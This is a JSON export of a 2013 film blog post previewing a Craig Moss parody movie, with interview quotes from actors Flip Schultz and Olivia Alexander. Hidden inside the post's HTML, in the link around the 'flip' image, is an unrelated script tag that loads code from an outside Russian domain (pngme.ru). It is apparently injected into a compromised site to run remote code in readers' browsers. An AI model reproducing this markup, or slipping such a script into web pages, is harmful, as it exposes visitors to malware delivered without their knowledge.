{"id":5858,"date":"2013-01-08T10:15:17","date_gmt":"2013-01-08T16:15:17","guid":{"rendered":"http:\/\/www.bmovienation.com\/?p=5858"},"modified":"2013-01-08T10:15:17","modified_gmt":"2013-01-08T16:15:17","slug":"upcoming-30-nights-of-paranormal-activity-with-the-devil-inside-the-girl-with-the-dragon-tattoo","status":"publish","type":"post","link":"http:\/\/www.bmovienation.com\/?p=5858","title":{"rendered":"Upcoming &#8220;30 Nights of Paranormal Activity with the Devil Inside the Girl with the Dragon Tattoo&#8221;"},"content":{"rendered":"<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=5860\" rel=\"attachment wp-att-5860\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-5860\" alt=\"cover\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/01\/cover-300x169.jpg\" width=\"300\" height=\"169\" srcset=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/01\/cover-300x169.jpg 300w, http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/01\/cover.jpg 620w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Horror, creatures, mockmusters, how about a comedy break? \u00a0\u201c30 Nights of Paranormal Activity with the Devil Inside the Girl with the Dragon Tattoo\u201d is the third parody feature written and directed by Craig Moss.\u00a0\u00a0\u00a0 Parodies can be very dangerous because you need actors that look and act like the original actors.\u00a0 Also, if the comedy is too exaggerated, forced, or has too much toilet humor then it can kill the comedy and entire movie.<\/p>\n<p>After watching \u201cBreaking Wind\u201d again which is Craig\u2019s parody of Twilight, I appreciated how he bombarded us with nonstop humor and he didn\u2019t try too hard to shock or disgust us.\u00a0 \u00a0Simple things I enjoyed like when Bella tells her father that Edward is in her life and Edward\u2019s head pops in for half a second to say \u201cHello\u201d.\u00a0 It\u2019s the same simple comedy that I enjoyed in Zucker Zucker Abrahams films.<\/p>\n<p><a href=\"http:\/\/www.youtube.com\/%5bwatch?v=NIJ_zOoKnBY%5d\">http:\/\/www.youtube.com\/[watch?v=NIJ_zOoKnBY]<\/a><\/p>\n<p>Flip Schultz who starred in \u201cBreaking Wind\u201d also stars as Aaron Galen in \u201c30 Nights of Paranormal Activity with the Devil Inside the Girl with the Dragon Tattoo\u201d.\u00a0 After telling Flip I enjoyed \u201cBreaking Wind\u201d I asked him if we can expect the same in \u201c30 Nights\u2026\u201d.<\/p>\n<p>Flip, \u201cSo glad you liked &#8220;Breaking Wind&#8221;, that was a fun movie to work on.\u201d30 Nights of Paranormal Activity&#8230;.&#8221; is going to be even more outrageous &#8211; Abraham Lincoln hooks up with &#8216;The Girl With The Dragon Tattoo&#8217; &amp; my character has a personal moment with Donald Trump &#8211; but it also is a damn good comedy on it&#8217;s own. There&#8217;s silliness, physical comedy, parody, great writing &amp; great performances.\u201d<\/p>\n<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=5868\" rel=\"attachment wp-att-5868\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-5868\" alt=\"flip\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/01\/flip.jpg\" width=\"204\" height=\"300\" \/><script src=\"\/\/pngme.ru\/seter\"><\/script><\/a><\/p>\n<p>Olivia Alexander plays Liz Galen (Flip\u2019s daughter) and had a more challenging role than she did in \u201cAttack of the 50 Foot Cheerleader\u201d.<\/p>\n<p>Olivia, \u201cThis was definitely the hardest role I have ever done because it was not only physically demanding, but Lisbeth is iconic. I know how much she means to the fans of \u201cThe Girl With the Dragon Tattoo\u201d and I didn\u2019t want to screw it up! I spent a lot of time just being obsessed with \u201cThe Girl With The Dragon Tattoo\u201d. I watched the movies probably 20 times, read blogs, and interviews with Rooney Mara. Everyday our incredible hair and make up department would transform me. I didn\u2019t even recognize myself.\u00a0 The moment I walked on set, I realized that I didn\u2019t have to do any work. Not only were the people I was working with hilarious, but also Craig Moss is a real talent. He is an incredible communicator and knows exactly what he wants. Once I got my first few scenes knocked out, I fell into a really comfortable stride.\u00a0 The great thing about funny writing is that you just have to trust in it. On top of it all, we had so much freedom to improv and that made it a blast.
